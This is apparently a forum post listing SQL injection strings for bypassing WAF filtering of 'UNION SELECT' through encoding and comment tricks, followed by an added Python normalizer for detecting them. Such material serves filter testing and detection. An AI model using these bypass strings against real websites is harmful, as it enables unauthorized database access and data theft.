SQL Injection: Bypassing UNION SELECT Filtering

Posted FireC@t @ Perl6

#WAF Bypassing Strings:

    /*!%55NiOn*/ /*!%53eLEct*/
    %55nion(%53elect 1,2,3)-- -
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    +#uNiOn+#sEleCt
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /*!%55NiOn*/ /*!%53eLEct*/
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*--*/union/*--*/select/*--*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
    +union+distinct+select+
    +union+distinctROW+select+
    +UnIOn%0d%0aSeleCt%0d%0a
    UNION/*&test=1*/SELECT/*&pwn=2*/
    un?+un/**/ion+se/**/lect+
    +UNunionION+SEselectLECT+
    +uni%0bon+se%0blect+
    %252f%252a*/union%252f%252a /select%252f%252a*/
    /%2A%2A/union/%2A%2A/select/%2A%2A/
    %2f**%2funion%2f**%2fselect%2f**%2f
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    /*!UnIoN*/SeLecT+

#Union Select Bypass with URL-Encoded Method:

    %55nion(%53elect)
    union%20distinct%20select
    union%20%64istinctRO%57%20select
    union%2053elect
    %23?%0auion%20?%23?%0aselect
    %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
    %55nion %53eLEct
    u%6eion se%6cect
    unio%6e %73elect
    unio%6e%20%64istinc%74%20%73elect
    uni%6fn distinct%52OW s%65lect
    %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
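
Most of the strings listed above differ only in percent-encoding, letter case, and MySQL comment syntax, so a filter that canonicalizes a value before matching sees them as the same input. The following is an added example, not part of the original post; the names `normalize` and `is_union_select` are hypothetical, and the comment handling is an approximation of MySQL lexing rather than a full parser.

```python
import re
from urllib.parse import unquote_plus

# Comment syntax, scanned left to right; every match becomes one space.
_COMMENTS = re.compile(
    r"/\*!\d*"          # opener of a MySQL versioned comment: its body is kept
    r"|/\*(?!!).*?\*/"  # ordinary block comment: dropped whole
    r"|\*/"             # closer left over from a versioned comment
    r"|#[^\n]*"         # '#' line comment
    r"|--[ \t][^\n]*",  # '-- ' line comment
    re.S,
)
_UNION_SELECT = re.compile(
    r"\bunion\b[\s(]*(?:(?:distinctrow|distinct|all)\b[\s(]*)?select\b"
)

def normalize(value: str, max_rounds: int = 3) -> str:
    """Canonicalize a request value before pattern matching."""
    for _ in range(max_rounds):        # undo repeated percent-encoding
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = _COMMENTS.sub(" ", value.lower())
    return " ".join(value.split())     # collapse every whitespace run

def is_union_select(value: str) -> bool:
    return _UNION_SELECT.search(normalize(value)) is not None

# Strings copied from the list above, plus one benign value
# constructed for this example (the last entry).
SAMPLES = [
    "/*!%55NiOn*/ /*!%53eLEct*/",
    "/**//*!50000UNION SELECT*//**/",
    "+#1q%0AuNiOn all#qa%0A#%0AsEleCt",
    "union (/*!/**/ SeleCT */ 1,2,3)",
    # Not flagged: only becomes UNION SELECT if a filter deletes the
    # inner keywords, which is why a filter should reject, not rewrite.
    "+UNunionION+SEselectLECT+",
    "reunion selection committee",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(is_union_select(sample), repr(normalize(sample)))
```

Matching of this kind is a detection aid for logs and WAF rules; parameterized queries are what remove the injection point.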